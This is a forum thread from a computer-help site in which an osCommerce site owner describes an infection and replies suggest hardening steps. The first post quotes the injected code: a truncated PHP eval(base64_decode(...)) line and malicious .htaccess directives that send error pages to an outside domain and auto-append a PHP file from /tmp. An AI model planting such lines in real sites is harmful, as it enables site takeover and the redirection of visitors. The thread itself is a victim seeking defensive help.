Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

website security guidance


  • Please log in to reply
3 replies to this topic

#1 greatchap

greatchap

  • Members
  • 73 posts
  • OFFLINE
  •  
  • Local time:12:00 PM

Posted 23 May 2011 - 02:59 AM

Hello Guys,

How are you?

I have a website which is hosted by Hostgator. My website consists of php pages, oscommerce system and mysql databases. My site receives low-moderate traffic I guess.

Now a month ago there was some php injection or some attack. All the php files in my website were infected by some code which appeared on top of the php scripts. It was <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC...

I had to edit all php files and remove that code from there.

Now recently my site stopped opening. I got error Internal Server Error. After some research I figured that the .htaccess file has been tampered with. The following lines were appearing in each .htaccess file.

ErrorDocument 400 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 403 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 404 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 405 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 406 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 408 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 500 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 501 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 502 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 503 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 504 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 505 http://arthurlundt.cz.cc/ht_er_docs/
AddHandler application/x-httpd-php .html .htm
php_value auto_append_file "/tmp/13061108586234.php"


So I had to remove the files from their respective folders. I dont know why is this happening. What I know is that the oscommerce installation on the site is outdated. That could be one reason.

But otherwise what can I do to protect myself. I will tell the guys who developed my site to at least update the oscommerce installation.

I would be glad if anyone can help me.

Thanks a lot,

Cheers,
GR

BC AdBot (Login to Remove)

 


#2 Andrew

Andrew

    Bleepin' Night Watchman


  • Moderator
  • 8,258 posts
  • OFFLINE
  •  
  • Gender:Not Telling
  • Location:Right behind you
  • Local time:11:30 PM

Posted 23 May 2011 - 04:53 AM

From what I've read, OsCommerce is a terribly vulnerable platform to be using. The most common suggestions I've been seeing are to rename and password protect the /admin directory.

Though, given what I've just read, I would also suggest that perhaps ditching OsCommerce all together might be called for.

#3 WeWatch

WeWatch

  • Members
  • 1 posts
  • OFFLINE
  •  
  • Local time:01:30 AM

Posted 23 May 2011 - 06:45 AM

There are many steps you can take to secure an osCommerce site.

You can replace the $PHP_SELF lines in the application_top.php files (2 of them).

You can, as someone has already suggested, rename the admin folder (security by obscurity)

You can, disable the file_manager.php and define_language.php files. (they are two of the most attacked files on osCommerce)

You can use a variety of methods to prevent the double .php attack

You can use a strong .htaccess file (if you're not on Windows)

These steps go a long way in preventing osCommerce breaches.

#4 greatchap

greatchap
  • Topic Starter

  • Members
  • 73 posts
  • OFFLINE
  •  
  • Local time:12:00 PM

Posted 24 May 2011 - 06:08 AM

Thanks a lot for your input guys.

I was talking to the guy who developed my website. He said that a lot of custom coding has been done by us and we have used bare minimum of oscommerce framework.

He says the problems are a result of your website site hoster's weak security. In other words according to him websites hosted by Hostgator are prone to malware attacks or security breaches because their security is weak.

What should I do? Should I leave hostgator.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users